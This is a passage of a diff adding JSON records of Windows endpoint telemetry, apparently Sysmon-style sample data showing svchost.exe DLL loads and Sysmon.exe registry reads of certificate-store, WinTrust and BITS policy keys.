"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "FirewallAPI.dll", + "image_path": "C:\\Windows\\System32\\FirewallAPI.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877300000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\System32\\SHCore.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570877770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878080000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "esent.dll", + "image_path": "C:\\Windows\\System32\\esent.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "fwbase.dll", + "image_path": "C:\\Windows\\System32\\fwbase.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570877610000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878240000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\System32\\shlwapi.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570878390000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 